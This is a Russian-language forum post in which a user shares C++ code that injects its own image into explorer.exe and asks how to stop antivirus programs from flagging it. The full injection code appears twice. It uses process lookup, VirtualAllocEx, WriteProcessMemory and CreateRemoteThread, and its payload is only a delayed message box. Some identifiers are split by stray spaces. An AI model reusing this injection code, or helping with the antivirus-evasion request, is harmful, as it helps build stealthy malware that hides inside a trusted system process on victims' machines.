gold-goblin
25.06.2007, 16:52
Короче вот код на С++ осуществляющий инжект в експлорер.ехе. Проблема в том что на него ругается антивири :mad: . Подскажите решения этой проблемы
#include < windows.h>
#include < tlhelp32.h>
#pragma comment(linker,"/BASE:0x13140000")
DWORD GetProcessID(char*);
BOOL Inject(HANDLE,DWORD(WINAPI* func)(LPVOID));
DWORD WINAPI func(LPVOID);
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)
{
if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,Ge tProcessID("explorer.exe")),&func)) return false;
return true;
}
DWORD WINAPI func(LPVOID)
{
LoadLibrary("kernel32.dll");
LoadLibrary("user32.dll");
SYSTEMTIME SysTime;
GetSystemTime(&SysTime);
WORD time=SysTime.wSecond+30;
while(time!=SysTime.wSecond){GetSystemTime(&SysTime);}
MessageBox(0,"Hello from addres area of explorer","title",0);
return true;
}
DWORD GetProcessID(char* lpNameProcess)
{
HANDLE snap;
PROCESSENTRY32 pentry32;
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0 );
if(snap==INVALID_HANDLE_VALUE) return 0;
pentry32.dwSize=sizeof(PROCESSENTRY32);
if(!Process32First(snap,&pentry32)) {CloseHandle(snap);return 0;}
do
{
if(!lstrcmpi(lpNameProcess,&pentry32.szExeFile[0]))
{
CloseHandle(snap);
return pentry32.th32ProcessID;
}
}while(Process32Next(snap,&pentry32));
CloseHandle(snap);
return 0;
}
BOOL Inject(HANDLE hProc,DWORD(WINAPI* func)(LPVOID))
{
DWORD id;
DWORD ByteOfWriten;
HMODULE hModule = GetModuleHandle(NULL);
DWORD size=((PIMAGE_OPTIONAL_HEADER)((LPVOID)((BYTE*)(hM odule)+((PIMAGE_DOS_HEADER)(hM
odule))->e_lfanew+sizeof(DWORD)+
sizeof(IMAGE_FILE_HEADER))))->SizeOfImage;
char* hNewModule = (char*)VirtualAllocEx(hProc,hModule,size,MEM_COMMI T|MEM_RESERVE,PAGE_EXECUTE_REA
DWRITE);
if(hNewModule==NULL) return false;
WriteProcessMemory(hProc,hNewModule,hModule,size,&ByteOfWriten);
if(ByteOfWriten!=size){return false;}
HANDLE hThread=CreateRemoteThread(hProc,NULL,0,func,(LPVO ID)hNewModule,0,&id);
if(hThread==0) return false;
return true;
}
#include < windows.h>
#include < tlhelp32.h>
#pragma comment(linker,"/BASE:0x13140000")
DWORD GetProcessID(char*);
BOOL Inject(HANDLE,DWORD(WINAPI* func)(LPVOID));
DWORD WINAPI func(LPVOID);
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)
{
if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,Ge tProcessID("explorer.exe")),&func)) return false;
return true;
}
DWORD WINAPI func(LPVOID)
{
LoadLibrary("kernel32.dll");
LoadLibrary("user32.dll");
SYSTEMTIME SysTime;
GetSystemTime(&SysTime);
WORD time=SysTime.wSecond+30;
while(time!=SysTime.wSecond){GetSystemTime(&SysTime);}
MessageBox(0,"Hello from addres area of explorer","title",0);
return true;
}
DWORD GetProcessID(char* lpNameProcess)
{
HANDLE snap;
PROCESSENTRY32 pentry32;
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0 );
if(snap==INVALID_HANDLE_VALUE) return 0;
pentry32.dwSize=sizeof(PROCESSENTRY32);
if(!Process32First(snap,&pentry32)) {CloseHandle(snap);return 0;}
do
{
if(!lstrcmpi(lpNameProcess,&pentry32.szExeFile[0]))
{
CloseHandle(snap);
return pentry32.th32ProcessID;
}
}while(Process32Next(snap,&pentry32));
CloseHandle(snap);
return 0;
}
BOOL Inject(HANDLE hProc,DWORD(WINAPI* func)(LPVOID))
{
DWORD id;
DWORD ByteOfWriten;
HMODULE hModule = GetModuleHandle(NULL);
DWORD size=((PIMAGE_OPTIONAL_HEADER)((LPVOID)((BYTE*)(hM odule)+((PIMAGE_DOS_HEADER)(hM
odule))->e_lfanew+sizeof(DWORD)+
sizeof(IMAGE_FILE_HEADER))))->SizeOfImage;
char* hNewModule = (char*)VirtualAllocEx(hProc,hModule,size,MEM_COMMI T|MEM_RESERVE,PAGE_EXECUTE_REA
DWRITE);
if(hNewModule==NULL) return false;
WriteProcessMemory(hProc,hNewModule,hModule,size,&ByteOfWriten);
if(ByteOfWriten!=size){return false;}
HANDLE hThread=CreateRemoteThread(hProc,NULL,0,func,(LPVO ID)hNewModule,0,&id);
if(hThread==0) return false;
return true;
}